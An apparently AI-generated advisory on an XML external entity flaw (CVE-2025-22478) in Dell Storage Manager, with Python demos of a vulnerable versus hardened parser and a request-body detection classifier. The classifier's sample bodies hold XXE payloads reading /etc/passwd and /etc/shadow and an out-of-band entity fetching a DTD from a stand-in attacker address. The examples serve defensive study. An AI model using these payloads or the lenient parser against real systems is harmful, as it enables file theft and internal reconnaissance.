CVE-2025-22478 Overview
CVE-2025-22478 affects Dell Storage Center - Dell Storage Manager version 20.1.20. The flaw is an Improper Restriction of XML External Entity Reference vulnerability [CWE-611]. An unauthenticated attacker with adjacent network access can exploit the issue to disclose sensitive information and tamper with data processed by the storage management interface.
Dell published the issue under advisory DSA-2025-191 on May 6, 2025.
Critical Impact
An adjacent-network attacker can exfiltrate sensitive files and tamper with XML-processed data through external entity injection against Dell Storage Manager without authentication.
Affected Products
- Dell Storage Manager 20.1.20
- Dell Storage Manager 2020 R1, R1.2, R1.10, R1.20
- Dell Storage Manager 16.3.20 and 2016 R2.1
Discovery Timeline
- 2025-05-06 - CVE-2025-22478 published to NVD
- 2025-05-06 - Dell releases security advisory DSA-2025-191
- 2025-05-13 - Last updated in NVD database
Technical Details for CVE-2025-22478
Vulnerability Analysis
The vulnerability resides in the XML parsing logic of Dell Storage Manager. The XML processor accepts documents that declare external entities and resolves them without applying entity restrictions. An attacker submits an XML payload referencing an external system identifier, and the parser fetches the referenced resource during document processing.
This behavior allows attackers to read local files from the storage management host. The parser can also issue outbound network requests on behalf of the application, enabling internal reconnaissance and tampering with XML-driven configuration flows. The CVSS vector indicates impact to confidentiality and integrity but not availability.
Root Cause
The root cause is improper restriction of XML external entity references [CWE-611]. The XML parser fails to disable DOCTYPE declarations, external general entities, and external parameter entities. Secure XML parsing requires explicitly disabling external entity resolution and DTD processing, which Dell Storage Manager 20.1.20 does not enforce.
Attack Vector
Exploitation requires adjacent network access to the Storage Manager interface; no authentication or user interaction is needed. The attacker sends a crafted XML document whose DOCTYPE declares an external entity pointing at a local file path such as file:///etc/passwd or at an internal HTTP endpoint, then references that entity in the document body. The parser resolves the entity while processing the document. Where the resolved value is reflected in a response or error message, the file contents are returned to the attacker; where it is not, the fetch itself still lets the attacker reach internal services from the Storage Manager host, i.e. the flaw can be chained into server-side request forgery.
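The following is an added illustration, not Dell code and not an exploit for this product: it reproduces the parser behaviour the Root Cause and Attack Vector sections describe using Python's standard-library expat bindings, and puts the hardened configuration next to it. The "secret" file, the payload and the element names are constructed for the demonstration.

```python
"""Added example (not Dell code): an XXE-prone expat configuration next to the
hardened one. The secret file and payload are constructed for the demo."""
import os
import tempfile
import xml.parsers.expat as expat


def _collect_text(parser):
    """Accumulate character data so we can see what the parser produced."""
    chunks = []
    parser.CharacterDataHandler = chunks.append
    return chunks


def parse_lenient(xml_bytes):
    """Weak configuration: external general entities are resolved by opening
    whatever the SYSTEM identifier names and feeding it back to the parser.
    This is the behaviour CWE-611 describes; never ship it."""
    parser = expat.ParserCreate()
    chunks = _collect_text(parser)

    def resolve(context, base, system_id, public_id):
        path = system_id[len("file://"):] if system_id.startswith("file://") else system_id
        child = parser.ExternalEntityParserCreate(context)  # child inherits the handlers
        with open(path, "rb") as fh:
            child.Parse(fh.read(), True)  # file contents become character data
        return 1  # 1 tells expat the reference was handled

    parser.ExternalEntityRefHandler = resolve
    parser.Parse(xml_bytes, True)
    return "".join(chunks)


def parse_hardened(xml_bytes):
    """Hardened configuration: refuse any DOCTYPE before a DTD is processed,
    never expand parameter entities, and abort if an external reference is
    somehow reached anyway."""
    parser = expat.ParserCreate()
    chunks = _collect_text(parser)

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        raise ValueError("DOCTYPE declarations are not accepted")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.ExternalEntityRefHandler = lambda *_: 0  # returning 0 aborts the parse
    parser.Parse(xml_bytes, True)
    return "".join(chunks)


def demo():
    """Constructed scenario: a config file holding a secret, and a payload whose
    DOCTYPE declares an external entity that points at it."""
    with tempfile.NamedTemporaryFile("w", suffix=".conf", delete=False) as fh:
        fh.write("admin_password=CHANGEME\n")
        secret_path = fh.name
    try:
        payload = (
            '<?xml version="1.0"?>\n'
            f'<!DOCTYPE volume [<!ENTITY xxe SYSTEM "file://{secret_path}">]>\n'
            "<volume><name>&xxe;</name></volume>"
        ).encode()
        leaked = parse_lenient(payload)  # the file contents come back as text
        try:
            parse_hardened(payload)
            blocked = False
        except ValueError:
            blocked = True  # rejected before any entity was read
        benign = parse_hardened(b"<volume><name>vol01</name></volume>")
        return leaked, blocked, benign
    finally:
        os.unlink(secret_path)


if __name__ == "__main__":
    print(demo())
```

Rejecting the DOCTYPE outright is the simplest correct fix: it removes internal-subset entity declarations, external DTD loading and parameter entities in one step, and a management API that exchanges its own schema-defined documents has no legitimate need for a client-supplied DTD.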
No public proof-of-concept exploit is currently available, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities catalog.
Detection Methods for CVE-2025-22478
Indicators of Compromise
- Inbound XML requests to Dell Storage Manager containing <!DOCTYPE or <!ENTITY declarations
- Outbound connections from the Storage Manager host to external attacker-controlled domains or unexpected internal IPs during XML processing
- Storage Manager log entries showing XML parser errors referencing SYSTEM identifiers or unresolved entities
- Unexpected file read access patterns from the Storage Manager service account
Detection Strategies
- Inspect HTTP request bodies destined for Storage Manager endpoints for XML payloads containing external entity declarations or SYSTEM/PUBLIC identifiers.
- Correlate Storage Manager process activity with outbound DNS and HTTP traffic to detect entity resolution callbacks.
- Monitor file access events on the Storage Manager host for reads of sensitive files by the management service user.
Monitoring Recommendations
- Forward Storage Manager application and access logs to a centralized analytics platform for retention and query.
- Alert on XML POST requests to management interfaces that originate outside the administrative subnets or arrive outside maintenance windows.
- Baseline normal outbound traffic from storage management hosts and flag deviations such as new DNS lookups or HTTP connections to external hosts.
How to Mitigate CVE-2025-22478
Immediate Actions Required
- Apply the fixed Dell Storage Manager release as documented in advisory DSA-2025-191.
- Restrict network access to the Storage Manager management interface to dedicated administrative VLANs and jump hosts.
- Audit Storage Manager logs for prior XML requests containing external entity declarations.
- Rotate any credentials, keys, or configuration secrets that could have been read from the management host.
Patch Information
Dell has released fixed builds through Dell Security Advisory DSA-2025-191. Administrators should review the advisory for the corrected build numbers and upgrade Dell Storage Manager installations running 20.1.20 and the other listed versions.
Workarounds
- Place the Storage Manager management interface behind a firewall that restricts access to authorized administrator subnets only.
- Disable or block external network egress from the Storage Manager host to prevent entity resolution callbacks. This limits out-of-band exfiltration and SSRF but does not stop local file reads via file:// identifiers, so combine it with the access restriction above.
- Inspect inbound XML traffic with a web application firewall rule that rejects payloads containing <!DOCTYPE or <!ENTITY declarations until the patch is applied. Match on the decoded body (honouring the declared encoding or BOM); an ASCII-only pattern misses a UTF-16 encoded payload.
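The check below is an added example that serves both the request-body inspection under Detection Strategies and the WAF workaround above; it is not Dell code or a vendor rule. It decodes a request body according to its BOM, then distinguishes bodies that declare an external general or parameter entity (block and alert) from bodies that merely carry a DOCTYPE (the workaround rejects these too; a detection pipeline may want to review them first) and from clean bodies. The sample bodies, element names and the 192.0.2.9 address are constructed, not captured traffic.

```python
"""Added example (not Dell code): classify XML request bodies by whether they
declare a DTD or external entities. Sample bodies below are constructed."""
import re

# XML keywords are case-sensitive, so exact matches suffice once the body is decoded.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b")
ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?P<param>%\s*)?(?P<name>[^\s>]+)\s+"
    r"(?:SYSTEM\s+(?P<sys>\"[^\"]*\"|'[^']*')"
    r"|PUBLIC\s+(?:\"[^\"]*\"|'[^']*')\s+(?P<pub>\"[^\"]*\"|'[^']*'))",
    re.DOTALL,
)


def decode_body(raw: bytes) -> str:
    """Honour a UTF-16 BOM so a re-encoded payload cannot dodge an ASCII match."""
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        return raw.decode("utf-16")
    return raw.decode("utf-8", errors="replace")


def classify_xml_body(raw: bytes) -> dict:
    """Return a verdict plus every external identifier found.

    'external_entity' -> block and alert
    'doctype'         -> reject under the WAF workaround; review in detection
    'clean'           -> allow
    """
    text = decode_body(raw)
    refs = []
    for m in ENTITY_RE.finditer(text):
        uri = (m.group("sys") or m.group("pub")).strip("\"'")
        refs.append({"name": m.group("name"),
                     "parameter": bool(m.group("param")),  # <!ENTITY % ...> = OOB/blind XXE
                     "uri": uri})
    if refs:
        verdict = "external_entity"
    elif DOCTYPE_RE.search(text):
        verdict = "doctype"
    else:
        verdict = "clean"
    return {"verdict": verdict, "refs": refs}


# Constructed sample request bodies (hypothetical element names, not real traffic).
SAMPLE_BODIES = {
    "benign": b'<?xml version="1.0"?><volume><name>vol01</name></volume>',
    "doctype_only": b'<!DOCTYPE volume [<!ELEMENT volume (name)>]><volume><name>x</name></volume>',
    "file_read": b'<!DOCTYPE v [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><v>&xxe;</v>',
    "oob_param": b'<!DOCTYPE v [<!ENTITY % ext SYSTEM "http://192.0.2.9/evil.dtd"> %ext;]><v/>',
    "utf16": '<!DOCTYPE v [<!ENTITY xxe SYSTEM "file:///etc/shadow">]><v>&xxe;</v>'.encode("utf-16"),
}


def scan_samples() -> dict:
    """Verdict for each constructed body; wire classify_xml_body into the WAF or log pipeline."""
    return {label: classify_xml_body(body)["verdict"] for label, body in SAMPLE_BODIES.items()}


if __name__ == "__main__":
    for label, body in SAMPLE_BODIES.items():
        print(label, classify_xml_body(body))
```

The parameter-entity case matters because it is the blind variant: nothing needs to be reflected in a response, the outbound fetch of the DTD is the signal, which is why the host-level egress monitoring listed under Detection Strategies belongs alongside this body inspection.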
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

